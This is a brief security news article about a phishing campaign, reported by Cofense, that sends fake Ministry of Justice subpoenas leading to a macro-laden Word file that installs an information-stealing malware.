Forced by an increasingly educated workforce, hackers are getting incredibly creative when it comes to phishing tactics. The latest in line is to pose as the Ministry of Justice, handing fake subpoenas to potential victims in hopes they’d panic and hurry to fix the issue without double-checking the authenticity of the email first.
Cofense Intelligence TM has spotted such emails going out to people working in insurance and retail companies. As one can expect, the emails look almost identical to what you could get from the Justice department, and in those emails it says the recipient has been subpoenaed and is required to click on a link to see more details.
Now the first link is benign – it’s a Google Docs file and as such, can be safely opened. But this is only to fool the victim into thinking the email is legit. The Docs file comes with a direct download link to a Word file sitting in a OneDrive folder.
That Word file has a macro which, once executed, downloads malware via PowerShell.
The malware itself, Cofense says, is a potent information stealer. It can gather information from most web browsers in use today, even those that aren’t as popular. It looks for browser information, cryptocurrency wallet data, FTP and email login credentials. It can also take screenshots of the infected device.
All the information it gathers, it stores in a file named information.log, which it then sends to its Command and Control server.